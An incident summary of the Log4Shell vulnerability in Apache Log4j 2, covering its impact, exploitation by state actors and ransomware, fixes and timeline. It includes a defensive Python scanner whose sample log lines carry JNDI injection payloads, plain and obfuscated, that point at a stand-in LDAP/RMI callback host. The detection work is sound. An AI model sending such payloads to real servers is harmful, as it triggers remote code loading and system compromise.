Other
Primary Source: CISA / Apache Software Foundation / CrowdStrike
Incident Details
Critical (CVSS 10.0) remote code execution vulnerability in the Apache Log4j 2 logging library, widely known as Log4Shell. Publicly disclosed on 9 Dec 2021; Apache released the patched version 2.15.0 the same day. That first fix was incomplete: follow-up releases addressed CVE-2021-45046 (2.16.0) and CVE-2021-45105 (2.17.0). Nation-state actors from China, Iran, North Korea and Russia were exploiting the flaw within days; CISA and the FBI attributed attacks on US critical infrastructure to an Iranian APT. Akamai observed roughly 2 million exploitation attempts per hour at peak. Affected products and services included VMware vCenter, Cisco, IBM WebSphere, Fortinet, AWS, Azure, GCP, Steam, Apple iCloud and Minecraft. UKG (Kronos) was hit with ransomware. Mass exploitation began before most organizations had applied patches.
Technical Details
- Initial Attack Vector
- CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection'). In Log4j 2 this took the form of JNDI lookup injection: any attacker-controlled string that reached a log call, such as a User-Agent header containing ${jndi:ldap://host/x}, was evaluated as a lookup and caused the JVM to fetch and load a class from the attacker's LDAP or RMI server.
- Vendor / Product
- Apache Log4j 2
- Software Package
- log4j
- Malware Family
- Conti (ransomware), various cryptominers, Orcus RAT
- CVE / GHSA References
- CVE-2021-44228 CVE-2021-45046 CVE-2021-45105
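As an added example, not taken from the page's sources or from Log4j itself, the Python below shows detection logic for the attack vector listed above. Attackers quickly moved from the plain ${jndi:...} string to obfuscated forms (percent-encoding, nested ${lower:}/${upper:} lookups, and the ${name:-default} trick that resolves an undefined lookup to its default), so the scanner first peels those layers the way Log4j resolves nested lookups inside-out, then matches on the JNDI signature and pulls out the callback scheme and host. The log lines, IP addresses and function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real telemetry). Three carry a JNDI
# lookup: plain, nested ${lower:} obfuscation, and percent-encoded with the
# ${::-x} default-value trick. The last two lines are benign.
SAMPLE_LOGS = [
    '203.0.113.7 - - [10/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:03:13:01 +0000] "GET /?x=${${lower:j}${lower:n}'
    '${lower:d}i:${lower:r}mi://198.51.100.23:1099/o} HTTP/1.1" 404 0',
    '203.0.113.9 - - [10/Dec/2021:03:13:20 +0000] "GET /login HTTP/1.1" 200 2048 "-" '
    '"%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.23%2Fx%7D"',
    '203.0.113.10 - - [10/Dec/2021:03:14:05 +0000] "GET /docs/${env:HOME} HTTP/1.1" 200 100',
    '203.0.113.11 - - [10/Dec/2021:03:15:00 +0000] "POST /api HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# Each pattern matches only an innermost lookup (no nested ${ } inside the
# braces); repeated rounds peel the nesting from the inside out.
_LOWER = re.compile(r"\$\{\s*lower\s*:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{\s*upper\s*:([^${}]*)\}", re.IGNORECASE)
# ${name:-default} and ${::-x}: an undefined lookup evaluates to its default.
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The signature we actually alert on, capturing scheme and callback host[:port].
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)", re.IGNORECASE)


def normalize(text, max_rounds=8):
    """Undo percent-encoding and the common lookup obfuscations, round by round,
    until the text stops changing (or max_rounds is hit)."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            return text
    return text


def scan(lines):
    """Return one record per log line that carries a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        m = _JNDI.search(normalize(line))
        if m:
            hits.append({
                "src": line.split()[0],          # client address, first field of the line
                "scheme": m.group(1).lower(),    # ldap, rmi, dns, ...
                "callback": m.group(2),          # attacker-controlled host[:port]
                "raw": line,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f'{hit["src"]} -> {hit["scheme"]}://{hit["callback"]}')
```

Two caveats a responder should keep in mind. First, this covers only a few of the evasions seen in the wild; other lookups and encodings can hide the string, so a miss is not evidence of absence, and the callback hosts it does extract are the more durable indicator (block or hunt them). Second, the lookup is triggered by whatever the application logs, not only the request line, so scan every logged field (User-Agent, other headers, form and JSON bodies) and treat string matching as triage, not as a fix; the fix is upgrading Log4j.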
Timeline
- 2021-12-01 Breach occurred
- 2021-12-09 Publicly disclosed
- unknown Customers notified